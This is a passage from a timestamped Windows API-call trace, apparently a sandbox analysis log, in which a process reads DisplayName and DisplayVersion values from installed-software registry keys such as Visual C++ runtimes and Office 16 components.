lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.517] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.517] RegCloseKey (hKey=0x608) returned 0x0 [0234.517] RegOpenKeyExW (in: hKey=0x610, lpSubKey="Connection Manager", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f0c4 | out: phkResult=0x38f0c4*=0x608) returned 0x0 [0234.518] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.518] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.518] RegCloseKey (hKey=0x608) returned 0x0 [0234.518] RegOpenKeyExW (in: hKey=0x610, lpSubKey="DirectDrawEx", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f0c4 | out: phkResult=0x38f0c4*=0x608) returned 0x0 [0234.518] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.518] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.518] RegCloseKey (hKey=0x608) returned 0x0 [0234.518] RegOpenKeyExW (in: hKey=0x610, lpSubKey="Fontcore", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f0c4 | out: phkResult=0x38f0c4*=0x608) returned 0x0 [0234.518] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.519] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.519] RegCloseKey (hKey=0x608) returned 0x0 [0234.519] RegOpenKeyExW (in: hKey=0x610, lpSubKey="IE40", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f0c4 | out: phkResult=0x38f0c4*=0x608) returned 0x0 [0234.519] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.519] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.519] RegCloseKey (hKey=0x608) returned 0x0 [0234.519] RegOpenKeyExW (in: hKey=0x610, lpSubKey="IE4Data", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f0c4 | out: phkResult=0x38f0c4*=0x608) returned 0x0 [0234.519] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.519] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.519] RegCloseKey (hKey=0x608) returned 0x0 [0234.520] RegOpenKeyExW (in: hKey=0x610, lpSubKey="IE5BAKEX", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f0c4 | out: phkResult=0x38f0c4*=0x608) returned 0x0 [0234.520] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.520] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.520] RegCloseKey (hKey=0x608) returned 0x0 [0234.520] RegOpenKeyExW (in: hKey=0x610, lpSubKey="IEData", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f0c4 | out: phkResult=0x38f0c4*=0x608) returned 0x0 [0234.520] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.520] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.520] RegCloseKey (hKey=0x608) returned 0x0 [0234.521] RegOpenKeyExW (in: hKey=0x610, lpSubKey="MobileOptionPack", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f0c4 | out: phkResult=0x38f0c4*=0x608) returned 0x0 [0234.521] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.521] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.521] RegCloseKey (hKey=0x608) returned 0x0 [0234.521] RegOpenKeyExW (in: hKey=0x610, lpSubKey="SchedulingAgent", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f0c4 | out: phkResult=0x38f0c4*=0x608) returned 0x0 [0234.521] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.521] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.521] RegCloseKey (hKey=0x608) returned 0x0 [0234.521] RegOpenKeyExW (in: hKey=0x610, lpSubKey="WIC", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f0c4 | out: phkResult=0x38f0c4*=0x608) returned 0x0 [0234.522] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.522] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.522] RegCloseKey (hKey=0x608) returned 0x0 [0234.522] RegOpenKeyExW (in: hKey=0x610, lpSubKey="{0FA68574-690B-4B00-89AA-B28946231449}", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f0c4 | out: phkResult=0x38f0c4*=0x608) returned 0x0 [0234.522] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x1, lpData=0x0, lpcbData=0x38f0e0*=0x7e) returned 0x0 [0234.522] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x265abb4, lpcbData=0x38f0e0*=0x7e | out: lpType=0x38f0e4*=0x1, lpData="Microsoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508", lpcbData=0x38f0e0*=0x7e) returned 0x0 [0234.522] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x1, lpData=0x0, lpcbData=0x38f0e0*=0x18) returned 0x0 [0234.522] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x265ad20, lpcbData=0x38f0e0*=0x18 | out: lpType=0x38f0e4*=0x1, lpData="14.25.28508", lpcbData=0x38f0e0*=0x18) returned 0x0 [0234.644] RegCloseKey (hKey=0x608) returned 0x0 [0234.645] RegOpenKeyExW (in: hKey=0x610, lpSubKey="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f0c4 | out: phkResult=0x38f0c4*=0x608) returned 0x0 [0234.645] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x1, lpData=0x0, lpcbData=0x38f0e0*=0x76) returned 0x0 [0234.645] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x2660614, lpcbData=0x38f0e0*=0x76 | out: lpType=0x38f0e4*=0x1, lpData="Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005", lpcbData=0x38f0e0*=0x76) returned 0x0 [0234.645] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x1, lpData=0x0, lpcbData=0x38f0e0*=0x16) returned 0x0 [0234.645] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x2660770, lpcbData=0x38f0e0*=0x16 | out: lpType=0x38f0e4*=0x1, lpData="12.0.21005", lpcbData=0x38f0e0*=0x16) returned 0x0 [0234.645] RegCloseKey (hKey=0x608) returned 0x0 [0234.645] RegOpenKeyExW (in: hKey=0x610, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f0c4 | out: phkResult=0x38f0c4*=0x608) returned 0x0 [0234.646] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.646] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.646] RegCloseKey (hKey=0x608) returned 0x0 [0234.646] RegOpenKeyExW (in: hKey=0x610, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f0c4 | out: phkResult=0x38f0c4*=0x608) returned 0x0 [0234.646] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.646] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.646] RegCloseKey (hKey=0x608) returned 0x0 [0234.647] RegOpenKeyExW (in: hKey=0x610, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f0c4 | out: phkResult=0x38f0c4*=0x608) returned 0x0 [0234.647] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.647] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.647] RegCloseKey (hKey=0x608) returned 0x0 [0234.647] RegOpenKeyExW (in: hKey=0x610, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f0c4 | out: phkResult=0x38f0c4*=0x608) returned 0x0 [0234.647] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.648] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.648] RegCloseKey (hKey=0x608) returned 0x0 [0234.648] RegOpenKeyExW (in: hKey=0x610, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f0c4 | out: phkResult=0x38f0c4*=0x608) returned 0x0 [0234.648] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.648] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.648] RegCloseKey (hKey=0x608) returned 0x0 [0234.648] RegOpenKeyExW (in: hKey=0x610, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f0c4 | out: phkResult=0x38f0c4*=0x608) returned 0x0 [0234.649] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.649] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.649] RegCloseKey (hKey=0x608) returned 0x0 [0234.649] RegOpenKeyExW (in: hKey=0x610, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f0c4 | out: phkResult=0x38f0c4*=0x608) returned 0x0 [0234.649] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.649] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.649] RegCloseKey (hKey=0x608) returned 0x0 [0234.650] RegOpenKeyExW (in: hKey=0x610, lpSubKey="{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f0c4 | out: phkResult=0x38f0c4*=0x608) returned 0x0 [0234.650] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x1, lpData=0x0, lpcbData=0x38f0e0*=0x78) returned 0x0 [0234.650] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x26617a0, lpcbData=0x38f0e0*=0x78 | out: lpType=0x38f0e4*=0x1, lpData="Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508", lpcbData=0x38f0e0*=0x78) returned 0x0 [0234.650] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x1, lpData=0x0, lpcbData=0x38f0e0*=0x18) returned 0x0 [0234.650] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x26618fc, lpcbData=0x38f0e0*=0x18 | out: lpType=0x38f0e4*=0x1, lpData="14.25.28508", lpcbData=0x38f0e0*=0x18) returned 0x0 [0234.650] RegCloseKey (hKey=0x608) returned 0x0 [0234.650] RegOpenKeyExW (in: hKey=0x610, lpSubKey="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f0c4 | out: phkResult=0x38f0c4*=0x608) returned 0x0 [0234.651] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x1, lpData=0x0, lpcbData=0x38f0e0*=0x7a) returned 0x0 [0234.651] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x2661c74, lpcbData=0x38f0e0*=0x7a | out: lpType=0x38f0e4*=0x1, lpData="Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030", lpcbData=0x38f0e0*=0x7a) returned 0x0 [0234.651] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x1, lpData=0x0, lpcbData=0x38f0e0*=0x1a) returned 0x0 [0234.651] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x2661dd8, lpcbData=0x38f0e0*=0x1a | out: lpType=0x38f0e4*=0x1, lpData="11.0.61030.0", lpcbData=0x38f0e0*=0x1a) returned 0x0 [0234.651] RegCloseKey (hKey=0x608) returned 0x0 [0234.651] RegOpenKeyExW (in: hKey=0x610, lpSubKey="{3c3aafc8-d898-43ec-998f-965ffdae065a}", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f0c4 | out: phkResult=0x38f0c4*=0x608) returned 0x0 [0234.652] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x1, lpData=0x0, lpcbData=0x38f0e0*=0x7a) returned 0x0 [0234.652] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x266215c, lpcbData=0x38f0e0*=0x7a | out: lpType=0x38f0e4*=0x1, lpData="Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501", lpcbData=0x38f0e0*=0x7a) returned 0x0 [0234.652] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x1, lpData=0x0, lpcbData=0x38f0e0*=0x1a) returned 0x0 [0234.652] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x26622c0, lpcbData=0x38f0e0*=0x1a | out: lpType=0x38f0e4*=0x1, lpData="12.0.30501.0", lpcbData=0x38f0e0*=0x1a) returned 0x0 [0234.652] RegCloseKey (hKey=0x608) returned 0x0 [0234.652] RegOpenKeyExW (in: hKey=0x610, lpSubKey="{65e650ff-30be-469d-b63a-418d71ea1765}", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f0c4 | out: phkResult=0x38f0c4*=0x608) returned 0x0 [0234.652] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x1, lpData=0x0, lpcbData=0x38f0e0*=0x86) returned 0x0 [0234.653] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x2662670, lpcbData=0x38f0e0*=0x86 | out: lpType=0x38f0e4*=0x1, lpData="Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508", lpcbData=0x38f0e0*=0x86) returned 0x0 [0234.653] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x1, lpData=0x0, lpcbData=0x38f0e0*=0x1c) returned 0x0 [0234.653] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x26627ec, lpcbData=0x38f0e0*=0x1c | out: lpType=0x38f0e4*=0x1, lpData="14.25.28508.3", lpcbData=0x38f0e0*=0x1c) returned 0x0 [0234.653] RegCloseKey (hKey=0x608) returned 0x0 [0234.653] RegOpenKeyExW (in: hKey=0x610, lpSubKey="{6913e92a-b64e-41c9-a5e6-cef39207fe89}", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f0c4 | out: phkResult=0x38f0c4*=0x608) returned 0x0 [0234.653] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x1, lpData=0x0, lpcbData=0x38f0e0*=0x86) returned 0x0 [0234.653] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x2662b80, lpcbData=0x38f0e0*=0x86 | out: lpType=0x38f0e4*=0x1, lpData="Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508", lpcbData=0x38f0e0*=0x86) returned 0x0 [0234.653] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x1, lpData=0x0, lpcbData=0x38f0e0*=0x1c) returned 0x0 [0234.654] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x2662cfc, lpcbData=0x38f0e0*=0x1c | out: lpType=0x38f0e4*=0x1, lpData="14.25.28508.3", lpcbData=0x38f0e0*=0x1c) returned 0x0 [0234.654] RegCloseKey (hKey=0x608) returned 0x0 [0234.654] RegOpenKeyExW (in: hKey=0x610, lpSubKey="{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f0c4 | out: phkResult=0x38f0c4*=0x608) returned 0x0 [0234.654] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x1, lpData=0x0, lpcbData=0x38f0e0*=0x54) returned 0x0 [0234.655] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x266309c, lpcbData=0x38f0e0*=0x54 | out: lpType=0x38f0e4*=0x1, lpData="Microsoft Visual C++ 2005 Redistributable", lpcbData=0x38f0e0*=0x54) returned 0x0 [0234.655] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x1, lpData=0x0, lpcbData=0x38f0e0*=0x14) returned 0x0 [0234.655] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x26631b0, lpcbData=0x38f0e0*=0x14 | out: lpType=0x38f0e4*=0x1, lpData="8.0.61001", lpcbData=0x38f0e0*=0x14) returned 0x0 [0234.655] RegCloseKey (hKey=0x608) returned 0x0 [0234.655] RegOpenKeyExW (in: hKey=0x610, lpSubKey="{90160000-008C-0000-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f0c4 | out: phkResult=0x38f0c4*=0x608) returned 0x0 [0234.656] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x1, lpData=0x0, lpcbData=0x38f0e0*=0x5e) returned 0x0 [0234.656] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x26634f8, lpcbData=0x38f0e0*=0x5e | out: lpType=0x38f0e4*=0x1, lpData="Office 16 Click-to-Run Extensibility Component", lpcbData=0x38f0e0*=0x5e) returned 0x0 [0234.656] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x1, lpData=0x0, lpcbData=0x38f0e0*=0x1e) returned 0x0 [0234.656] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x2663624, lpcbData=0x38f0e0*=0x1e | out: lpType=0x38f0e4*=0x1, lpData="16.0.4266.1003", lpcbData=0x38f0e0*=0x1e) returned 0x0 [0234.656] RegCloseKey (hKey=0x608) returned 0x0 [0234.656] RegOpenKeyExW (in: hKey=0x610, lpSubKey="{90160000-008C-0409-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f0c4 | out: phkResult=0x38f0c4*=0x608) returned 0x0 [0234.656] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x1, lpData=0x0, lpcbData=0x38f0e0*=0x5c) returned 0x0 [0234.656] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x26639e4, lpcbData=0x38f0e0*=0x5c | out: lpType=0x38f0e4*=0x1, lpData="Office 16 Click-to-Run Localization Component", lpcbData=0x38f0e0*=0x5c) returned 0x0 [0234.656] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x1, lpData=0x0, lpcbData=0x38f0e0*=0x1e) returned 0x0 [0234.656] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x2663b08, 